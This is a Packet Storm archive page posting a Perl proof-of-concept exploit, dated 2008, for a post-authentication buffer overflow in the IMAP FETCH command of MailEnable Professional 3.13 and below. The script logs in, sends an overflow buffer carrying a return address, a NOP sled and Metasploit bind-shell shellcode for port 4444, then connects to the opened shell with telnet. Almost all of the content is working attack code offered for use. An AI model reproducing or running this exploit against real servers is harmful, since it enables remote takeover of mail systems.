what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

mailenablefetch-overflow.txt

mailenablefetch-overflow.txt
Posted Mar 14, 2008
Authored by haluznik

MailEnable Professional versions 3.13 and below FETCH post-auth buffer overflow exploit for Win2K SP4 Pro English that binds a shell to port 4444.

tags | exploit, overflow, shell
systems | windows
SHA-256 | 7e7101147a2e72dbb6c49217a55ad143fd64d10f290aecc14e1617bff2e7a405

mailenablefetch-overflow.txt

Change Mirror Download
#!/usr/bin/perl

# =================================================================
# MailEnable Professional <= 3.13 "FETCH" post-auth buffer overflow
# =================================================================
#
# Bind Shell POC Exploit for Win2K SP4 pro English
#
# Found by : Luigi Auriemma
# Advisory : http://aluigi.altervista.org/adv/maildisable-adv.txt
#
# Exploit by : haluznik | haluznik<at>gmail.com
#
# 10.3.2008 ..enjoy!:]
# =================================================================


use IO::Socket;

print "\n [*] MailEnable Professional 3.13 imap remote exploit";
print "\n [*] exploit by haluznik | bug discovered by Luigi Auriemma\n\n";

if (@ARGV < 3)
{
print " [!] Use: perl imap.pl [Host] [User] [Pass]\n";
exit;
}

my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

my $port = "143";

# metasploit shellcode port 4444
# bad char: 0x00 0x0A 0x0D 0x20 0x29
my $shellcode=
"\x2b\xc9\x66\x81\xe9\xb0\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76".
"\x0e\xe6\x02\xe4\x6f\x83\xee\xfc\xe2\xf4\x1a\x68\x0f\x22\x0e\xfb".
"\x1b\x90\x19\x62\x6f\x03\xc2\x26\x6f\x2a\xda\x89\x98\x6a\x9e\x03".
"\x0b\xe4\xa9\x1a\x6f\x30\xc6\x03\x0f\x26\x6d\x36\x6f\x6e\x08\x33".
"\x24\xf6\x4a\x86\x24\x1b\xe1\xc3\x2e\x62\xe7\xc0\x0f\x9b\xdd\x56".
"\xc0\x47\x93\xe7\x6f\x30\xc2\x03\x0f\x09\x6d\x0e\xaf\xe4\xb9\x1e".
"\xe5\x84\xe5\x2e\x6f\xe6\x8a\x26\xf8\x0e\x25\x33\x3f\x0b\x6d\x41".
"\xd4\xe4\xa6\x0e\x6f\x1f\xfa\xaf\x6f\x2f\xee\x5c\x8c\xe1\xa8\x0c".
"\x08\x3f\x19\xd4\x82\x3c\x80\x6a\xd7\x5d\x8e\x75\x97\x5d\xb9\x56".
"\x1b\xbf\x8e\xc9\x09\x93\xdd\x52\x1b\xb9\xb9\x8b\x01\x09\x67\xef".
"\xec\x6d\xb3\x68\xe6\x90\x36\x6a\x3d\x66\x13\xaf\xb3\x90\x30\x51".
"\xb7\x3c\xb5\x51\xa7\x3c\xa5\x51\x1b\xbf\x80\x6a\xf5\x33\x80\x51".
"\x6d\x8e\x73\x6a\x40\x75\x96\xc5\xb3\x90\x30\x68\xf4\x3e\xb3\xfd".
"\x34\x07\x42\xaf\xca\x86\xb1\xfd\x32\x3c\xb3\xfd\x34\x07\x03\x4b".
"\x62\x26\xb1\xfd\x32\x3f\xb2\x56\xb1\x90\x36\x91\x8c\x88\x9f\xc4".
"\x9d\x38\x19\xd4\xb1\x90\x36\x64\x8e\x0b\x80\x6a\x87\x02\x6f\xe7".
"\x8e\x3f\xbf\x2b\x28\xe6\x01\x68\xa0\xe6\x04\x33\x24\x9c\x4c\xfc".
"\xa6\x42\x18\x40\xc8\xfc\x6b\x78\xdc\xc4\x4d\xa9\x8c\x1d\x18\xb1".
"\xf2\x90\x93\x46\x1b\xb9\xbd\x55\xb6\x3e\xb7\x53\x8e\x6e\xb7\x53".
"\xb1\x3e\x19\xd2\x8c\xc2\x3f\x07\x2a\x3c\x19\xd4\x8e\x90\x19\x35".
"\x1b\xbf\x6d\x55\x18\xec\x22\x66\x1b\xb9\xb4\xfd\x34\x07\x16\x88".
"\xe0\x30\xb5\xfd\x32\x90\x36\x02\xe4\x6f";

my $buff = "A" x 997 . "\xbb\xed\x4f\x7c" . "\x90" x 20 . $shellcode;

my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die " [-] cannot connect to host!\n";

recv($socket, $reply, 1024, 0);
print " [i] " . $reply;
print " [+] logging..\n";

$exploit = "a001 LOGIN " . $user ." " . $pass ."\r\n";
send $socket, $exploit, 0;
recv($socket, $reply, 1024, 0);
print " [i] " . $reply;

$exploit = "a002 SELECT INBOX" ."\r\n";
send $socket, $exploit, 0;

print " [+] sending evil payload..\n";

$exploit = "a003 FETCH 1:4 " . $buff ."\r\n";
send $socket, $exploit, 0;

print " [*] exploiting done!\n";
print " [*] connecting to port 4444 of $host\n";
sleep(6);
system("telnet $host 4444");

close $socket;
exit;
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close